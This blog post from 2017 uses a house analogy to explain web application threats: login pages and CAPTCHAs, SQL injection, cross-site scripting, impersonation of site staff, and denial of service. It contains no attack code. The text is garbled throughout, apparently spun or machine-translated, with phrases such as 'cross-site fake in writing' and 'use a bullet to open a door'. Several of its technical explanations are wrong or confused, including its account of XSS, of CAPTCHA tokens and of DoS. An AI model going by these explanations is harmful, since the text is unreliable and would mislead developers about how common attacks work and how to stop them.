Secure Your Application Development like Your Own House

By | July 5, 2017

free-appAn easy way to see the security of web applications development is to imagine your own home. It has a front door, rear side windows, a number of rooms, shelter, fences and various paths. Only the terminology is different.
The front door:
The gateway of a web application is the login page and, not surprisingly, is the most important point of the attack. A login page will consist of input fields to enter a username and password and a button to send them to the server to authenticate your access to the rest of the web application. Some pages logging in can provide a captcha to make sure you are a human and not offer a model the same way on another server. Tour model form variations of usernames and passwords until you access the application. This is known as cross-site fake in writing and is similar to a thief smithing the keys of your home.
Captcha’s collapsed images of letters and numbers that make it impossible to encrypt read an automated script. Unfortunately, as the scripts are getting smarter by reading these images, the captcha images need to be more complex and difficult to read for humans. This causes end-user frustration because they are repeated failed attempts to access your account because the captcha was unreadable. The solution to this has been to replace the captcha with a secure token. The secure token is generated by linking the username, password and other information available to the user with a key generated only. This link is encrypted and stored as a hidden field on the form, so it is impossible for any form of mock-up for an attempt to make a successful login.
The windows and the back door:

What are the windows of a web application? I do not mean the operating system on the server. I am talking about the possible areas of each page that could break to make a burglary. These areas are input fields and text fields areas that allow the user to enter information. An attacker input fields and text areas for input command understand the database. If the software is not securely written, easily interrupt the database when data is stored, to perform the commands that the attacker performs. Typical attacks can result in database destruction, data theft or user information. This attack is known as SQL injection.
Boundary fences:
Border fences of a web page left, editable areas and the main URL. The page URL itself and left embedded in the page can be copied and modified from another site so commands can be performed by the server. JavaScript code can be inserted into editable areas to force the submission of data to a fraudulent site or to gain control of the user’s web browser. The database commands can also be inserted into the main URL. These attacks are known as attack scripting (XSS) because they are scripts that direct the user to an attacker’s own website. XSS attacks could be used to steal and use a user’s ID that authenticated session to use to increase the level of access other accounts already created.
To prevent cross-site scripting, the software must explore all editable areas for code and also a secure token for each URL and link. Like the holes and gaps in the fences they must be closed. All protected pages must check for a verified user.

 

Imitation:

We have all experienced bogus house callers who claim that the gasman or water company says they have access to their home to turn off the device. Website attackers can contact you or other users of your site via email, social network or by phone and will allow you the opportunity to reveal your credentials. Reasons given may be that your site has been hacked and that it can be fixed if given access. The only prevention is to constantly remind your users not to reveal their username and password to anyone, and that you as the site owner will never ask them to reveal their password. You must provide links for users to delete the password by sending an email link to an encryption token to secure the source.
Input of brute force:

The easiest and quickest access for a burglar to break into is to use a bullet to open a door or break a window with a brick.
The high-tech version of this method is the Denial of Service (DoS) attack. A DoS attack keeps a web page running several times until the Web server runs out of memory and shuts off.
As the number decreases thieves, the number of hackers is increasing. A thief may have been only after financial gain; What if political, financial or simply malicious hacker motivation damage can be. An unprotected home can never get tested, but the truth is that an unsecured website will eventually be attacked.

Related posts: